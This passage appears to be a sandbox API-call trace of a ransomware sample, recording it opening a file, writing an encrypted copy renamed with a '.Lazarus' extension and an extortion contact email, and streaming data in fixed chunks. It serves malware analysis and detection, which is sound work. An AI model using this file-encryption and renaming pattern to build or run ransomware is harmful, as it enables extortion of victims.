returned 1 [0062.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0062.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0062.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 45 [0062.248] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141aa)) returned 1 [0062.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0062.248] AreFileApisANSI () returned 1 [0062.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0062.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0062.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0062.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0062.248] GetLastError () returned 0x0 [0062.248] SetLastError (dwErrCode=0x0) [0062.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df18 [0062.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0062.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bd10 [0062.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0062.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0062.249] GetLastError () returned 0x0 [0062.249] SetLastError (dwErrCode=0x0) [0062.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0062.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0062.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71a30 [0062.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0062.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0062.249] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0062.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0062.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0062.249] AreFileApisANSI () returned 1 [0062.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0062.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0062.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0062.249] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.250] GetFileType (hFile=0x428) returned 0x1 [0062.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0062.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0062.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0062.250] AreFileApisANSI () returned 1 [0062.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0062.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0062.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 45 [0062.250] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0062.250] GetFileType (hFile=0x420) returned 0x1 [0062.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0062.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a630 [0062.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0062.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.250] GetLastError () returned 0x0 [0062.250] SetLastError (dwErrCode=0x0) [0062.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.251] GetLastError () returned 0x0 [0062.251] SetLastError (dwErrCode=0x0) [0062.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0062.251] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0062.251] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0062.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0062.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0062.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0062.283] GetLastError () returned 0x0 [0062.283] SetLastError (dwErrCode=0x0) [0062.283] GetLastError () returned 0x0 [0062.283] SetLastError (dwErrCode=0x0) [0062.283] GetLastError () returned 0x0 [0062.283] SetLastError (dwErrCode=0x0) [0062.284] GetLastError () returned 0x0 [0062.284] SetLastError (dwErrCode=0x0) [0062.284] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.515] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.515] GetLastError () returned 0x0 [0062.515] SetLastError (dwErrCode=0x0) [0062.516] GetLastError () returned 0x0 [0062.516] SetLastError (dwErrCode=0x0) [0062.516] GetLastError () returned 0x0 [0062.516] SetLastError (dwErrCode=0x0) [0062.516] GetLastError () returned 0x0 [0062.516] SetLastError (dwErrCode=0x0) [0062.516] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.516] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.516] GetLastError () returned 0x0 [0062.516] SetLastError (dwErrCode=0x0) [0062.516] GetLastError () returned 0x0 [0062.516] SetLastError (dwErrCode=0x0) [0062.517] GetLastError () returned 0x0 [0062.517] SetLastError (dwErrCode=0x0) [0062.517] GetLastError () returned 0x0 [0062.517] SetLastError (dwErrCode=0x0) [0062.517] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.517] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.517] GetLastError () returned 0x0 [0062.517] SetLastError (dwErrCode=0x0) [0062.517] GetLastError () returned 0x0 [0062.517] SetLastError (dwErrCode=0x0) [0062.517] GetLastError () returned 0x0 [0062.517] SetLastError (dwErrCode=0x0) [0062.518] GetLastError () returned 0x0 [0062.518] SetLastError (dwErrCode=0x0) [0062.518] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.518] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.518] GetLastError () returned 0x0 [0062.518] SetLastError (dwErrCode=0x0) [0062.518] GetLastError () returned 0x0 [0062.518] SetLastError (dwErrCode=0x0) [0062.518] GetLastError () returned 0x0 [0062.518] SetLastError (dwErrCode=0x0) [0062.518] GetLastError () returned 0x0 [0062.518] SetLastError (dwErrCode=0x0) [0062.519] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.519] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.519] GetLastError () returned 0x0 [0062.519] SetLastError (dwErrCode=0x0) [0062.519] GetLastError () returned 0x0 [0062.519] SetLastError (dwErrCode=0x0) [0062.519] GetLastError () returned 0x0 [0062.519] SetLastError (dwErrCode=0x0) [0062.519] GetLastError () returned 0x0 [0062.519] SetLastError (dwErrCode=0x0) [0062.519] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.520] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.520] GetLastError () returned 0x0 [0062.520] SetLastError (dwErrCode=0x0) [0062.520] GetLastError () returned 0x0 [0062.520] SetLastError (dwErrCode=0x0) [0062.520] GetLastError () returned 0x0 [0062.520] SetLastError (dwErrCode=0x0) [0062.520] GetLastError () returned 0x0 [0062.520] SetLastError (dwErrCode=0x0) [0062.520] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.520] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.521] GetLastError () returned 0x0 [0062.521] SetLastError (dwErrCode=0x0) [0062.521] GetLastError () returned 0x0 [0062.521] SetLastError (dwErrCode=0x0) [0062.521] GetLastError () returned 0x0 [0062.521] SetLastError (dwErrCode=0x0) [0062.521] GetLastError () returned 0x0 [0062.521] SetLastError (dwErrCode=0x0) [0062.521] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.521] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.521] GetLastError () returned 0x0 [0062.521] SetLastError (dwErrCode=0x0) [0062.522] GetLastError () returned 0x0 [0062.522] SetLastError (dwErrCode=0x0) [0062.522] GetLastError () returned 0x0 [0062.522] SetLastError (dwErrCode=0x0) [0062.522] GetLastError () returned 0x0 [0062.522] SetLastError (dwErrCode=0x0) [0062.522] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.522] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.522] GetLastError () returned 0x0 [0062.522] SetLastError (dwErrCode=0x0) [0062.522] GetLastError () returned 0x0 [0062.522] SetLastError (dwErrCode=0x0) [0062.522] GetLastError () returned 0x0 [0062.523] SetLastError (dwErrCode=0x0) [0062.523] GetLastError () returned 0x0 [0062.523] SetLastError (dwErrCode=0x0) [0062.523] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.523] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.523] GetLastError () returned 0x0 [0062.523] SetLastError (dwErrCode=0x0) [0062.523] GetLastError () returned 0x0 [0062.523] SetLastError (dwErrCode=0x0) [0062.524] GetLastError () returned 0x0 [0062.524] SetLastError (dwErrCode=0x0) [0062.524] GetLastError () returned 0x0 [0062.524] SetLastError (dwErrCode=0x0) [0062.524] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.524] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.524] GetLastError () returned 0x0 [0062.524] SetLastError (dwErrCode=0x0) [0062.524] GetLastError () returned 0x0 [0062.524] SetLastError (dwErrCode=0x0) [0062.524] GetLastError () returned 0x0 [0062.524] SetLastError (dwErrCode=0x0) [0062.525] GetLastError () returned 0x0 [0062.525] SetLastError (dwErrCode=0x0) [0062.525] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.525] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.525] GetLastError () returned 0x0 [0062.525] SetLastError (dwErrCode=0x0) [0062.525] GetLastError () returned 0x0 [0062.525] SetLastError (dwErrCode=0x0) [0062.525] GetLastError () returned 0x0 [0062.525] SetLastError (dwErrCode=0x0) [0062.525] GetLastError () returned 0x0 [0062.525] SetLastError (dwErrCode=0x0) [0062.526] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.526] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.526] GetLastError () returned 0x0 [0062.526] SetLastError (dwErrCode=0x0) [0062.526] GetLastError () returned 0x0 [0062.526] SetLastError (dwErrCode=0x0) [0062.526] GetLastError () returned 0x0 [0062.526] SetLastError (dwErrCode=0x0) [0062.526] GetLastError () returned 0x0 [0062.526] SetLastError (dwErrCode=0x0) [0062.526] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.527] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.527] GetLastError () returned 0x0 [0062.527] SetLastError (dwErrCode=0x0) [0062.527] GetLastError () returned 0x0 [0062.527] SetLastError (dwErrCode=0x0) [0062.527] GetLastError () returned 0x0 [0062.527] SetLastError (dwErrCode=0x0) [0062.527] GetLastError () returned 0x0 [0062.527] SetLastError (dwErrCode=0x0) [0062.527] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.527] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.528] GetLastError () returned 0x0 [0062.528] SetLastError (dwErrCode=0x0) [0062.528] GetLastError () returned 0x0 [0062.528] SetLastError (dwErrCode=0x0) [0062.528] GetLastError () returned 0x0 [0062.528] SetLastError (dwErrCode=0x0) [0062.528] GetLastError () returned 0x0 [0062.528] SetLastError (dwErrCode=0x0) [0062.528] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.528] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.528] GetLastError () returned 0x0 [0062.528] SetLastError (dwErrCode=0x0) [0062.529] GetLastError () returned 0x0 [0062.529] SetLastError (dwErrCode=0x0) [0062.529] GetLastError () returned 0x0 [0062.529] SetLastError (dwErrCode=0x0) [0062.529] GetLastError () returned 0x0 [0062.529] SetLastError (dwErrCode=0x0) [0062.529] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.529] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.529] GetLastError () returned 0x0 [0062.529] SetLastError (dwErrCode=0x0) [0062.529] GetLastError () returned 0x0 [0062.529] SetLastError (dwErrCode=0x0) [0062.529] GetLastError () returned 0x0 [0062.530] SetLastError (dwErrCode=0x0) [0062.530] GetLastError () returned 0x0 [0062.530] SetLastError (dwErrCode=0x0) [0062.530] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.530] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.530] GetLastError () returned 0x0 [0062.530] SetLastError (dwErrCode=0x0) [0062.530] GetLastError () returned 0x0 [0062.530] SetLastError (dwErrCode=0x0) [0062.530] GetLastError () returned 0x0 [0062.530] SetLastError (dwErrCode=0x0) [0062.530] GetLastError () returned 0x0 [0062.530] SetLastError (dwErrCode=0x0) [0062.531] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0062.531] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.531] GetLastError () returned 0x0 [0062.531] SetLastError (dwErrCode=0x0) [0062.531] GetLastError () returned 0x0 [0062.531] SetLastError (dwErrCode=0x0) [0062.531] GetLastError () returned 0x0 [0062.531] SetLastError (dwErrCode=0x0) [0062.531] GetLastError () returned 0x0 [0062.531] SetLastError (dwErrCode=0x0) [0062.531] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1aa, lpOverlapped=0x0) returned 1 [0062.531] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0062.532] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0062.532] GetLastError () returned 0x0 [0062.532] SetLastError (dwErrCode=0x0) [0062.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa) returned 0x7d798 [0062.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0062.532] GetLastError () returned 0x0 [0062.532] SetLastError (dwErrCode=0x0) [0062.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0062.532] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0x1b0, lpOverlapped=0x0) returned 1 [0062.532] GetLastError () returned 0x0 [0062.532] SetLastError (dwErrCode=0x0) [0062.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0062.532] GetLastError () returned 0x0 [0062.533] SetLastError (dwErrCode=0x0) [0062.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0062.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0062.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0062.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0062.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0062.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0062.533] CloseHandle (hObject=0x428) returned 1 [0062.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0062.535] CloseHandle (hObject=0x420) returned 1 [0062.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0062.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0062.535] AreFileApisANSI () returned 1 